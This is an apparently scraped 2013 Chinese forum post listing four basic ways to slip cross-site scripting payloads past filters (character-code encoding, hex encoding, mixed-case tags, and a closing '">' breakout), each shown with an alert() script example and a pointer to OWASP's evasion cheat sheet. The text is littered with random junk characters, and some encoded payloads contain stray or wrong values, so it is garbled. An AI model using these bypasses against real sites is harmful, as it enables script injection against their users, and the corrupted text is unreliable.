四种超级基础的绕过方法。: N4 R( N1 H5 U, a) G; Q! ]
1.转换为ASCII码
7 {! B# x, n0 l5 [0 P例子:原脚本为<script>alert(‘I love F4ck’)</script >" Q7 j# t+ Y5 {/ S O
通过转换,变成:/ \( T2 G$ n6 z! A: r# s" Y- ~
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>/ s: s1 F/ m* \) {9 I* b
' ?, F9 s; T/ G0 L/ w
2.转换为HEX(十六进制)
4 p A1 w1 |5 _5 y0 f例子:原脚本为<script>alert(‘I love F4ck’)</script>$ t0 P! ^) J/ J9 a
通过转换,变成:, g# d) z) n K+ E" X+ V$ o
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e$ d- c. s+ @5 M9 Z% w. D/ {! d
2 k/ U k$ B: f3 g) h3.转换脚本的大小写
R' x! B- O7 E; Y9 W例子:原脚本为<script>alert(‘I love F4ck’)</script>4 b5 i2 {9 D$ M/ B8 u
转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>3 z: z$ j& z9 n! T$ v6 v5 d
j; J( J6 t/ J) X) V) f$ Y% z, U
4.增加闭合标记”>
7 A' R0 H+ D7 L+ _例子:原脚本为<script>alert(‘I love F4ck’)</script>
, Q9 K) d' Z, H3 \- l7 f转换为:”><script>alert(‘I love F4ck’)</script>
# X# `* f; a0 K: d+ U1 ?# z i# u7 y更详细绕过技术请参考此网页- S7 E8 d+ X! ]' ?
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
+ t) n+ l8 a8 g: I 2 F9 Q4 `7 E1 Z7 ^' h }
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对